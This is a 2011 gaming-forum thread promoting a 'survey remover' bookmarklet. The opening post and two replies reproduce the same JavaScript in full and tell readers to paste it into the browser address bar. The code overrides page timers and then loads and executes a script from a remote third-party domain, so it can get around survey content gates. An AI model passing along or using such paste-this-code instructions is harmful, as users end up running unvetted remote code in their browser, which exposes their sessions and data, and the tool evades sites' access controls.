Page 1 of 2 1 2 Last
THREAD: Survey Remover!!!
  1. 07-28-2011, 12:35 AM
    Alpha's Hoe
    Versace.
    Alpha's Hoe
    Versace.
    NextGenUpdate
    Hello everyone! Today I will be showing you how to remove survey's on all survey websites. (Sharecash surveys are an exception)
    First of all I would like to give credit to [Only registered and activated users can see links. ] for developing this.
    At the bottom of the page I will post the text.

Step 1:Copy&Paste the text.
    Step 2:Enter it into the address bar when the survey has popped up.
    Step 3: Hit enter!
    Step 4: Enjoy what ever download is behind those surveys!

COPY:
    javascript:(function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.displ ay="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="[url=http://survey-remover.com/]Save Your Time, Money and Privacy - XJZ Survey Remover[/url]";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122) );return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"(){")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4e30e5905b19e",TO:setTimeout("alert(\"It appears that the host could not be reached :(\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.i nit();};document.documentElement.firstElementChild .appendChild(a);};window[xc[0]](window[er],110);})();

Thanks ~~NGU-Max

EDIT: Could a mod please change the smileys to there original text
    Last edited by Connor; 07-28-2011 at 02:30 PM.

2. 07-28-2011, 12:41 AM
    Pichu
    RIP PICHU.
    Pichu
    RIP PICHU.
    NextGenUpdate
    Remove the smiles... they get in the way of my copy, paste, fail abilities.
  3. 07-28-2011, 01:08 AM
    Coqui
    Former Staff
    Coqui
    Former Staff
    NextGenUpdate
    Put that javascript into a PHP BBCode BTW I don't have anything to test this :FU:
  4. 07-28-2011, 02:14 AM
    NextGenUpdate
    Remove the smile's i cant copy and paste :/
  5. 07-28-2011, 02:15 AM
    NextGenUpdate
    sooooooo helpful thx.
  6. 07-28-2011, 02:36 AM
    EZ.
    < ^ > < ^ >
    EZ.
    < ^ > < ^ >
    NextGenUpdate
    Originally Posted by Sick Puppies View Post
    Remove the smiles... they get in the way of my copy, paste, fail abilities.
    the smileys need to be there they are those its not intentional this site just makes em into smileys
  7. 07-28-2011, 02:43 AM
    Pichu
    RIP PICHU.
    Pichu
    RIP PICHU.
    NextGenUpdate
    Originally Posted by BlueWafflesYUM! View Post
    the smileys need to be there they are those its not intentional this site just makes em into smileys
    There is an option when you go to post a thread to allow smilies into that post.
  8. 07-28-2011, 02:47 AM
    EZ.
    < ^ > < ^ >
    EZ.
    < ^ > < ^ >
    NextGenUpdate
    Originally Posted by Sick Puppies View Post
    There is an option when you go to post a thread to allow smilies into that post.
    javascript: (function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.displ ay="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="Save Your Time, Money and Privacy - XJZ Survey Remover";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122) );return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"(){")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4e30e5905b19e",TO:setTimeout("alert(\"It appears that the host could not be reached: (\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.i nit();};document.documentElement.firstElementChild .appendChild(a);};window[xc[0]](window[er],110);})();

here copy and paste that just close the space between : ( those two
  9. 07-28-2011, 03:02 AM
    Pichu
    RIP PICHU.
    Pichu
    RIP PICHU.
    NextGenUpdate
    Originally Posted by BlueWafflesYUM! View Post
    javascript: (function(){(function(){var z=["Timeout","Interval"];for(var i=0;i<1;i++){var x=window["set"+z[i]]("null",1);eval("delete clear"+z[i]);if (window["clear"+z[i]]==undefined){if (typeof(ar)=="undefined"){var ar=document.createElement("iframe");ar.style.displ ay="none";document.body.appendChild(ar);}window["clear"+z[i]]=ar.contentWindow["clear"+z[i]];}for(var j=x;j>0&&x-j<99999;j--)window["clear"+z[i]](j);}})();var bd="Save Your Time, Money and Privacy - XJZ Survey Remover";var gn=function(){var q=function(min,max){return Math.floor(Math.random()*(max-min+1))+min;};var n="";for(var r=0;r<q(9,19);r++)n+=String.fromCharCode(q(97,122) );return n;};var sj=["Timeout","Interval"];var bl=[];var xc=[];for(var i=0;i<2;i++){bl.push(window["set"+sj[i]]);window["set"+sj[i]]=function(a,b){};for(var j in window){try{if(typeof(window[j])=="function"){if((window[j]+"").indexOf("function set"+sj[i]+"(){")!=-1)window[j]=function(a,b){};}}catch(e){}}var op=gn();xc.push(op);window[op]=bl[i];}var er=gn();window[er]=function(){window.setTimeout=bl[0];window.setInterval=bl[1];xjz={version:"2.0",domain:"http://survey-remover.com/",id:"4e30e5905b19e",TO:setTimeout("alert(\"It appears that the host could not be reached: (\nPlease try to use the bookmarklet again later!\n\"+xjz.domain);",10000)};var a=document.createElement("script");a.type="text/javascript";a.src=xjz.domain.replace("//","//public.")+"remover/";a.onload=function(){xjz.surveyRemover=new xjz.SurveyRemover(xjz.version);xjz.surveyRemover.i nit();};document.documentElement.firstElementChild .appendChild(a);};window[xc[0]](window[er],110);})();

here copy and paste that just close the space between : ( those two
    Maybe tomorrow. Tired lol.
  10. 07-28-2011, 04:05 AM
    NGU-AZ
    Bounty hunter
    NGU-AZ
    Bounty hunter
    NextGenUpdate
    This does NOT work for all surveys.
Page 1 of 2 1 2 Last